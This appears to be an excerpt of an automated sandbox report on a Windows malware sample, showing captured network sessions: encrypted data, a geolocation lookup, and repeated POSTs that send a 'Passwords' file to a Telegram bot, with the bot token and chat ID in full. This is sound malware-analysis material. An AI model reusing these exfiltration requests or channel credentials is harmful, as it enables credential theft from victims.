                                                                                                                    Data Ascii: ;vai*K&E9+@-.#i.xG;%:Gl,9m$5F# yby(3<^y=KPW<pEsS>~4^GC%w~QJ\@_B>>jzy)rp?*~d?ES1#vMhM'Z'|H9&yo>p"W$PAY+
                                                                                                                    2025-01-11 06:23:57 UTC4816INData Raw: 5b d8 ef 1a c9 2e 18 d5 4c 60 05 c2 55 16 01 77 51 31 6f e2 32 c6 93 41 d2 d7 e9 18 d8 d3 e7 f6 ef ef 82 6c 58 ce 57 2b e4 7f 59 2a eb 52 8f dd 92 80 17 7d 8e f3 b1 40 f7 01 8c 79 3a 41 17 69 ab 38 38 39 98 f1 a5 60 ed 81 0d 10 85 3b d9 cf 07 2a e2 0e db b6 71 23 41 4a 79 da cd f5 e7 7c 3d 0b 78 e4 2a e7 69 c8 ab b1 89 82 bb aa 49 53 3e 91 12 2a 83 bf 22 a5 ce 74 d6 d5 b3 58 41 52 15 fb 08 d5 d3 75 96 c2 d3 99 ea f5 46 0a aa 18 53 a4 3f 88 b3 2f 1e 9b bc 1f 7e 6e 8c e2 d3 ea bb 51 22 64 b6 4f d4 fc fe f9 68 4d 42 aa ec 6b 42 5f f5 37 36 d6 c8 b8 bf f1 57 76 df 72 07 93 f7 8e ab 02 b7 1d c7 8b 2f 2b 90 a8 33 50 23 d6 7e 89 12 73 43 73 5d cf 00 3d 50 ff 6c 5a 74 15 40 7e 08 e3 e1 c1 fb 2f a0 f7 e4 36 47 20 a8 b8 95 8b 67 8a e3 49 9c f3 9c 39 21 b3 96 4e 3f
                                                                                                                    Data Ascii: [.L`UwQ1o2AlXW+Y*R}@y:Ai889`;*q#AJy|=x*iIS>*"tXARuFS?/~nQ"dOhMBkB_76Wvr/+3P#~sCs]=PlZt@~/6G gI9!N?
                                                                                                                    2025-01-11 06:23:57 UTC1325INData Raw: 5f 98 aa 18 53 a8 39 8b 6d f2 fd 4d 67 a8 6a 7e bb 19 d4 ed ca bb 61 aa 3e 2d 75 98 0e 59 b3 ff e9 b6 6b df 13 e1 5d f1 3c 20 b8 e8 db e4 9c d3 6a d9 ff 2d f0 17 c5 fb 75 63 76 8b a1 3d 07 9c 3c 7f bc 1a 94 ae 21 d0 67 a9 1c 5e 41 02 08 0f 49 06 00 2c 95 c3 4d 75 b2 42 c5 fa 3c 86 c5 22 11 4c e6 13 79 5f 28 8d 3f 6e 6f a7 f2 4a 3c d9 57 a6 e1 fb 3d c6 55 ee 8f 89 89 2d 65 a7 68 45 be 06 dc 4d d4 9e 4e 74 d6 92 f0 77 e1 07 2b 14 3c 32 f1 ae 49 b1 aa 52 5e a4 86 a0 15 80 4c 27 91 f8 6c 5d df 0a 4f 31 fa 81 4f 84 a8 54 f5 81 5b 22 43 c6 b5 7f 61 d3 3c ba d7 f4 6b b1 78 ac 05 90 78 89 48 bc ab b4 97 a6 58 06 ef ba 81 c8 87 15 32 d8 48 47 e0 07 7b 37 6e cd d3 f7 7e bb bc 4b 11 05 10 f3 52 b4 22 7c 5b a3 80 ae 13 68 e4 35 83 35 58 68 65 be 6e 3c 43 13 7c 57 91
                                                                                                                    Data Ascii: _S9mMgj~a>-uYk]< j-ucv=<!g^AI,MuB<"Ly_(?noJ<W=U-ehEMNtw+<2IR^L'l]O1OT["Ca<kxxHX2HG{7n~KR"|[h55Xhen<C|W
                                                                                                                    2025-01-11 06:23:57 UTC1390INData Raw: bc bf 83 22 58 06 ed 66 f7 d0 f5 33 0f 8c 38 e5 cf 13 7b 4b ad dc d4 dd d1 9c dd 75 57 10 14 ab 23 91 39 7f 34 65 80 84 15 ca da 19 fb 55 67 69 15 1c 63 9c 43 02 76 46 eb 0f f0 20 6b 62 f3 25 b8 f4 fa 9e 85 51 60 31 ce 51 6f d1 a3 12 38 94 69 3b 6c d1 8f 70 be 33 48 cf 28 00 bf 5a 33 5c e9 79 92 ad 89 ce 2a 1e 19 5b 33 73 b8 95 9c 88 a4 10 52 41 7c 73 5b 0e be eb a9 29 8a 57 07 36 81 a0 a7 60 bf a5 bb a7 fb 46 de 66 f2 45 96 84 7a 86 47 ba 9b a8 3b 36 cb 16 99 a3 25 52 66 f5 a2 fd 3f c3 43 c3 0f f4 98 5e f6 94 b7 ca 5d 31 cd 18 07 b7 11 20 52 40 a7 5a 60 72 4c 28 d9 19 57 73 c5 20 90 a0 22 3c f5 e0 38 53 1d 97 2f 15 2b a0 fa 8b c8 d1 72 9d ab 45 c1 ef 4d ac af ea 44 28 c7 69 43 ef 7b 80 7f 71 ed 8c 8c 83 8f cf e3 93 d4 88 eb e6 58 78 1e e9 48 cd b9 77 9c
                                                                                                                    Data Ascii: "Xf38{KuW#94eUgicCvF kb%Q`1Qo8i;lp3H(Z3\y*[3sRA|s[)W6`FfEzG;6%Rf?C^]1 R@Z`rL(Ws "<8S/+rEMD(iC{qXxHw
                                                                                                                    2025-01-11 06:23:57 UTC1390INData Raw: 33 fd 9e cd 26 84 c6 e4 21 d9 20 fb ad 68 2f 0e 85 8d 68 26 c7 20 33 3c 54 6a 32 f2 05 a2 d8 39 00 4d 3c 8b 87 eb 11 70 4f 9c 0d d7 9c bc d0 bb 1e ef 80 5d e9 6a 6a 82 fe 9d 10 f3 ea 66 71 7c 11 78 5b 25 da ec d3 af 62 28 f5 60 54 9d 9a b7 f2 94 2d 3f 6c 42 5d e5 1f c9 d4 02 dc 1c 51 f9 b7 09 7d 24 45 c1 f2 50 c4 33 6b f0 2e 38 bf b4 67 5e b4 fa 68 1a 89 2e a1 33 e7 09 28 c9 65 60 aa 4a c1 ac f9 b4 f3 34 aa e5 85 f3 af 5f c8 20 c6 95 9a 40 eb 1f 61 e2 83 7c ef 0a 18 24 b8 98 00 1a 61 06 50 98 0c 74 fa 06 94 5e d7 68 d8 cf 07 1d 30 1c e1 68 02 0a 0f 4c 13 63 f5 35 62 c4 d2 21 bb 89 87 38 9a 87 60 f6 78 69 9e e5 c8 12 f6 75 09 b0 09 5c 10 a8 01 a2 0f b4 70 11 a4 a3 9d 7f b1 66 c5 d7 57 e2 81 e0 dc ca 2b 73 b2 8d 3f f0 8a 3d c5 20 f2 20 07 03 9d 2c 9d 6c 72
                                                                                                                    Data Ascii: 3&! h/h& 3<Tj29M<pO]jjfq|x[%b(`T-?lB]Q}$EP3k.8g^h.3(e`J4_ @a|$aPt^h0hLc5b!8`xiu\pfW+s?= ,lr
                                                                                                                    2025-01-11 06:23:57 UTC1390INData Raw: e0 8e 82 a5 2d a1 04 ae 45 92 2d 14 90 8f e7 83 17 d6 e9 a1 87 4f 6d 2b 3b 03 9b fa fa 3d 1b f6 be 63 47 da 5b 3a 30 99 17 70 11 f9 d3 43 50 ac 64 52 64 cf e7 d6 3d 65 14 cc 23 2e 34 f2 b9 29 a5 9a a4 a0 47 0b c8 0d 1b b5 19 99 01 5b eb d3 c3 01 f2 94 0a d5 d1 26 f1 89 24 ee 4f 3f 88 51 cb e3 06 c6 49 f2 dd c2 03 79 40 7e 55 1a 7f 37 20 19 e2 38 e4 a9 3f c0 dd fa 15 e1 51 93 6b e5 ef 5d 73 52 d6 71 43 10 10 58 20 f8 53 9e 0a 5f 9f 23 59 91 ea a0 40 8b fb 8c 51 62 56 78 9c 76 2f 30 56 98 f0 a5 6a bb f3 0d 10 8b 45 8f c4 07 4b fc 49 da b6 71 23 44 b9 69 c4 e5 54 3c 52 37 02 0d f5 2a 94 e4 e4 a6 aa 92 f1 bb ac 37 4c 51 90 16 59 04 bf fe a7 2f 93 cd 0f ae 82 47 82 f7 2d 08 d5 d8 18 b0 ca c8 8c 82 73 4e 84 c9 03 98 8a 71 19 b3 25 14 e9 dd 13 6a 08 8c 33 d3 ea
                                                                                                                    Data Ascii: -E-Om+;=cG[:0pCPdRd=e#.4)G[&$O?QIy@~U7 8?Qk]sRqCX S_#Y@QbVxv/0VjEKIq#DiT<R7*7LQY/G-sNq%j3
                                                                                                                    2025-01-11 06:23:57 UTC1390INData Raw: fe bd 62 22 d1 b1 dc 65 42 32 f2 45 32 e2 c8 c8 d0 ec 48 6a f3 d8 95 98 fd 8c a3 58 b7 6d e5 aa bc 2b 9a a8 33 28 19 2e 7e 8d 6b ec 44 4a 11 dd 07 2c 50 e3 2e 5a 74 19 5d 71 15 2f fd c1 81 40 0c d7 e4 30 65 5b 50 6b 95 81 72 95 47 41 9a e5 8b 4c 85 af 97 3e 29 a1 e5 ca 1c 97 36 8a d8 c3 49 61 eb 26 bb 08 e6 52 d3 18 86 5f 66 98 b7 f7 f3 14 92 9a 82 47 00 ad 04 fd b3 85 97 04 a3 90 31 dc 2b cd 41 18 fd 35 c2 81 6b b4 4e 90 82 59 57 fb 71 8a 6d fc ba 98 66 a8 6a 6c f4 18 d4 e3 e7 39 63 d1 72 3e 7c 8d 05 36 06 fe fa b8 52 07 05 1f 56 e2 35 34 3d ad b0 81 36 d3 6e d1 ec 53 d2 48 c5 ff 57 a3 7f a3 3e 40 4b 9a 2f 7e bc 1a be 85 01 d0 5c 33 1e 5e d1 0a 19 08 1f 9a 1c 3d e5 ae e3 33 b2 44 ae db 6f 86 cf 00 85 18 e6 15 60 50 2e 8f 3f 0d 89 8e ff 38 51 b7 d6 a6 e5
                                                                                                                    Data Ascii: b"eB2E2HjXm+3(.~kDJ,P.Zt]q/@0e[PkrGAL>)6Ia&R_fG1+A5kNYWqmfjl9cr>|6RV54=6nSHW>@K/~\3^=3Do`P.?8Q
                                                                                                                    2025-01-11 06:23:57 UTC1390INData Raw: 2a 0f e8 40 d6 ba 78 89 5e dc 85 6e 0c 95 94 d2 7f e7 14 24 6a 3d 1f fc a6 5d fe ab 52 50 a4 c1 a0 15 8c 5f 2e 80 f3 03 eb de 19 41 5e a3 97 b1 8f 93 0b e4 8a 7d 38 63 7f b3 6e 6d ee 34 d7 f3 bc 6b bb 6d 8d fe 05 78 83 4e af ae b6 ec ea 73 26 eb ec 78 c8 87 15 12 9d 4f 35 76 16 72 54 06 09 d4 db 75 d6 98 07 11 0f 3c 67 81 b4 24 65 5e a3 91 80 61 8a fa 05 f9 23 5a e8 65 be 41 2a bd 01 6d 50 9d 93 fa 20 1b 70 ca a0 90 ba f0 88 71 d2 30 22 c2 44 63 ef ec 27 68 ab 69 31 7e f1 88 07 75 b6 96 b0 98 27 56 45 9d 79 f1 10 d1 b9 89 be 82 3b dc 4a 1c d3 9d 8f c4 cf a1 10 22 e1 59 75 4a 71 8b ce ba 5b a4 77 07 5d 13 82 07 2a bc af a8 86 85 49 cf 66 85 8d 9b ac 3e 8d 5d 3d 24 a7 3b 37 ea 00 eb 78 37 45 c0 44 80 fb 4a 34 50 fd 9f a8 42 b9 84 96 7f da 08 bb db 01 75 a3
                                                                                                                    Data Ascii: *@x^n$j=]RP_.A^}8cnm4kmxNs&xO5vrTu<g$e^a#ZeA*mP pq0"Dc'hi1~u'VEy;J"YuJq[w]*If>]=$;7x7EDJ4PBu
                                                                                                                    2025-01-11 06:23:57 UTC1390INData Raw: 40 5b 4b 08 52 00 02 33 ee 0e 34 14 7e 92 02 4f 0b 19 43 95 38 ac e1 25 c1 8b 11 ce 94 45 cb 9c 85 ac dd 7c 3f f7 b7 cb 6c 5a 57 3a 24 b7 9f a0 93 f1 1b 7a c6 fa aa 53 49 c3 48 a8 7d e5 36 63 1b 52 8d c6 69 12 9f 30 62 cf 8d 39 9e 30 f3 95 89 fe 07 30 d4 5e e5 a1 79 26 85 9b ab 37 28 b4 c4 b3 33 5e 79 39 e3 0b a2 d1 5c 86 44 3b ea ef 11 17 4e a5 75 24 47 73 bc 0e a1 28 d7 a2 53 9b 34 63 8c 8e 9d 0c f3 ea 66 bc 6d 00 43 03 4a 2a ec d3 a5 71 3a f7 72 3b 6c cd b6 f8 23 54 2d 7d 51 5a 3f 08 1f 1d 5b dc 1d 4b da a7 1f 12 30 37 23 c4 50 b4 31 7d fe 20 01 73 a2 76 47 a9 3b 4b 1a f3 20 fe 27 f1 92 02 19 63 48 52 b4 c0 b5 e5 a2 dd 61 b2 f4 9c d9 da 9e db 38 c0 b2 97 32 a6 10 79 92 fd bd f8 d0 0d 18 a6 e4 c8 22 57 02 47 42 0e 66 fd 0e 02 79 e0 58 cf de 1b 1d 2c ff
                                                                                                                    Data Ascii: @[KR34~OC8%E|?lZW:$zSIH}6cRi0b900^y&7(3^y9\D;Nu$Gs(S4cfmCJ*q:r;l#T-}QZ?[K07#P1} svG;K 'cHRa82y"WGBfyX,
                                                                                                                    2025-01-11 06:23:57 UTC1390INData Raw: 6a 2a 77 68 d3 37 4f 56 ac 39 a6 d5 60 e7 64 7a 83 f4 d5 38 0f 74 09 e7 19 4a 03 dc 11 b6 1e bf e1 39 60 e7 9d 75 a3 62 e4 cd 45 81 a8 25 dc f9 21 5b ed 8d 20 e6 b1 f3 b7 c2 fd 52 ee 35 bd 4d a3 50 f0 86 b5 3d fe 72 81 e5 c8 cc 80 9e a8 3f e2 05 b8 4f bf 5e c5 ba 8f e1 94 2f a2 b3 af 86 3f 02 c8 3b 03 8c dc f0 20 00 ed be 15 78 4e 48 3c 2c 81 06 c5 5f f8 d3 42 54 ba 4b d8 0c d3 ed b0 ac b1 19 c5 36 26 2d e6 92 52 cf 95 a0 d0 10 03 c8 0d 1d a6 6f 73 0b 5c e9 51 ac f8 82 fb d5 d2 f9 da e2 8c 3f c3 9c ac 88 5b de f6 1f d1 2e 22 9e c4 21 69 49 55 1c 64 73 59 5e 13 8d 37 cd 93 35 e8 43 e9 1c f6 4b ee e7 ec fb a2 61 4b cd 6a 26 fb ee 59 39 e0 49 84 2d 5a bb 98 55 bd f9 a0 4f 8b 5a 8c 51 62 50 1e 4b e3 2f 3a 3f 8b f4 a5 60 93 b2 2d 10 a9 e3 8f c4 0d 52 e5 21 28
                                                                                                                    Data Ascii: j*wh7OV9`dz8tJ9`ubE%![ R5MP=r?O^/?; xNH<,_BTK6&-Ros\Q?[."!iIUdsY^75CKaKj&Y9I-ZUOZQbPK/:?`-R!(


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449765104.21.96.14437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:01 UTC857INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:01 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Age: 1891430
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    cf-cache-status: HIT
                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWPlouuF7kChWfJzMOjhxdMSVSPxm7EaVg73jym4mD9RHxy1VbMAd6SgGKwOS71NrxPZZ1Xqzo%2BjxGpI1ipft9P%2B3DMNGydomB5ch4%2FZ9k9HEXJ217SERs%2FAxg2izbIBrjNIifnW"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 9002d2491b01de9a-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1594&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1760096&cwnd=209&unsent_bytes=0&cid=506bbbd105078b28&ts=149&x=0"
                                                                                                                    2025-01-11 06:24:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.449810149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:08 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd31dea4934fa5
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 65 61 34 39 33 34 66 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd31dea4934fa5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:08 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:08 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:08 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43761,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576648,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.449822149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:09 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd31f39219a5f5
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 33 39 32 31 39 61 35 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd31f39219a5f5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:10 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:10 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:10 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43762,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576650,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449832149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:11 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd320870af382e
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 38 37 30 61 66 33 38 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd320870af382eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:11 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:11 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:11 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
